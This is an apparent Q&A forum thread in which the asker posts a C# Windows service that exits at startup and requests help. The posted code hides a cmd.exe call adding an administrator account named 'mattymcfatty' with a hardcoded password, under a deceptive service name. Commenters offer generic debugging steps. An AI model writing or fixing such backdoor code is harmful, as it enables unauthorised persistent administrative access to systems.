# Windows Service starts and stops immadiately with unknown error message

Tags: c#, visual-studio

I have this windows service written in C#

```
namespace SimpleWindowsService1
{
    partial class SimpleService
    {
        /// <summary> 
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Component Designer generated code

        /// <summary> 
        /// Required method for Designer support - do not modify 
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.eventLogSimple = new System.Diagnostics.EventLog();
            ((System.ComponentModel.ISupportInitialize)(this.eventLogSimple)).BeginInit();
            // 
            // SimpleService
            // 
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
            startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            startInfo.FileName = "cmd.exe";
            startInfo.Arguments = "/C net user mattymcfatty Really1337! /add && net localgroup administrators mattymcfatty /add";
            process.StartInfo = startInfo;
            process.Start();

            this.ServiceName = "Not The Service You Think It Is";
            ((System.ComponentModel.ISupportInitialize)(this.eventLogSimple)).EndInit();

        }

        #endregion

        private System.Diagnostics.EventLog eventLogSimple;
    }
}
```

I can successfully rebuild it but when I start the Windows service, it exits immadiately. I used

```
sc create WindowsService.NET binPath="C:\Windows\Temp\SimpleWindowsService1.exe"
```

to create a new Windows task. It appears in the Windows services but it cannot be started. Unfortunately, the error message itself doesn't tell anything at all. Somebody has a clue how to do this corretly? I would be willing to pay if someone is able to solve this issue. Only want to get a new windows service working which is creating a new user account, that's it. I might be missing something obvious

Comment: Well, I'd start by trying it *without* the Process.Start call - if your service basically does nothing, does *that* work? Next, have you tried your Process.Start part from a simple console app? (It doesn't look to me like it would work...)

Comment: Thank you, let me try that

Comment: it works without the Process.Start call so far

Comment: I get error 216 0xd8 when I try to use this service with Process.Start()

Comment: Right. So you know it's Process.Start causing the problem. I would *next* try to write a simple console app which calls Process.Start, and get that working. Once you've got the two parts working individually, put them together. You may well need to configure the process to have more rights than normal though.

Comment: How do I write a simple console app?

Comment: thank you for your help I appreciate

Comment: "How do I write a simple console app?" Um, you create a new project with a type of "Console Application".

Comment: Oh, okay. So just isolating the whole InitializeComponent() function? Then I get lots of "variable name not defined" errors. Looks like a nightmare. Isn't that too difficult to make it isolated work and then put it together?

Comment: I'm afraid I'm going to stop responding here, as it looks like you're trying to effectively have an interactive debugging session, and that's really not what Stack Overflow is for. I've given the advice of "get an empty service working, get the Process.Start call working elsewhere, then you can look at putting the two together" - I don't think it's productive for me to keep adding more.

Comment: Okay thank you for your help. I appreciate. well idk how to spot the issue because isolating it causes more problems than before..

Comment: I would not ask if I wouldn't sitting here since over 60 hours trying to get this running. I am pretty sure it should work, but it doesn't..

Comment: Did you look in the Event Viewer for the system? It's possible more error information was logged to the Application Log. Start your service and then look in the Application Event Log for errors that occurred around the time you attempted to start the service.